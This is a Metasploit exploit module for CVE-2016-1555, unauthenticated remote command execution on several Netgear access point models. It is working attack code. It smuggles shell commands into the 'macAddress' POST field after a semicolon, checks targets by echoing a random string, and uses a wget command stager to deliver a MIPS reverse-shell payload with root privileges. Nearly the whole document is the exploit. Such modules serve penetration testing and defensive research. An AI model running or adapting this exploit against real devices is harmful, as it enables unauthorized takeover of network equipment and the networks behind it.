Netgear Unauthenticated Remote Command Execution

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::CmdStager  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Netgear Devices Unauthenticated Remote Command Execution',  
'Description' => %q{  
From the CVE-2016-1555 page: (1) boardData102.php, (2) boardData103.php,  
(3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in  
Netgear WN604 before 3.3.3 and WN802Tv2, WNAP210v2, WNAP320, WNDAP350,  
WNDAP360, and WNDAP660 before 3.5.5.0 allow remote attackers to execute  
arbitrary commands.  
},  
'Author' =>  
[  
'Daming Dominic Chen <ddchen[at]cs.cmu.edu>', # Vuln discovery  
'Imran Dawoodjee <imrandawoodjee.infosec[at]gmail.com>' # MSF module  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
['CVE', '2016-1555'],  
['URL', 'https://kb.netgear.com/30480/CVE-2016-1555-Notification?cid=wmt_netgear_organic'],  
['PACKETSTORM', '135956'],  
['URL', 'http://seclists.org/fulldisclosure/2016/Feb/112']  
],  
'DisclosureDate' => 'Feb 25 2016', # According to http://seclists.org/fulldisclosure/2016/Feb/112  
'Privileged' => true,  
'Platform' => 'linux',  
'Arch' => ARCH_MIPSBE,  
'Payload' => {},  
'DefaultOptions' => {  
'CMDSTAGER::FLAVOR' => 'wget',  
'PAYLOAD' => 'linux/mipsbe/shell_reverse_tcp',  
'WfsDelay' => 10 },  
'Targets' => [['Automatic', { }]],  
'CmdStagerFlavor'=> %w{ echo printf wget },  
'DefaultTarget' => 0  
))  
register_options(  
[  
OptString.new('TARGETURI', [true, 'Path of the vulnerable URI.', '/boardDataWW.php']), # boardDataWW.php  
OptString.new('MAC_ADDRESS', [true, 'MAC address to use (default: random)', Rex::Text.rand_text_hex(12)])  
])  
end  
  
# check for vulnerability existence  
def check  
fingerprint = Rex::Text.rand_text_alpha(12) # If vulnerability is present, we will get this back in the response  
res = execute_command("echo #{fingerprint}") # the raw POST response  
  
unless res  
vprint_error 'Connection failed'  
return CheckCode::Unknown  
end  
  
unless res.code == 200  
return CheckCode::Safe  
end  
  
unless res.get_html_document.at('input').to_s.include? fingerprint  
return CheckCode::Safe  
end  
  
CheckCode::Vulnerable  
end  
  
# execute a command, or simply send a POST request  
def execute_command(cmd, opts = {})  
vars_post = {  
'macAddress' => "#{datastore['MAC_ADDRESS']};#{cmd};",  
'reginfo' => '1',  
'writeData' => 'Submit'  
}  
  
send_request_cgi({  
'method' => 'POST',  
'headers' => { 'Connection' => 'Keep-Alive' },  
'uri' => normalize_uri(target_uri.path),  
'vars_post' => vars_post  
})  
rescue ::Rex::ConnectionError  
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the target!")  
end  
  
# the exploit method  
def exploit  
#run a check before attempting to exploit  
unless [CheckCode::Vulnerable].include? check  
fail_with Failure::NotVulnerable, 'Target is most likely not vulnerable!'  
end  
  
execute_cmdstager(linemax: 2048) # maximum 130,000  
end  
  
end  
  
`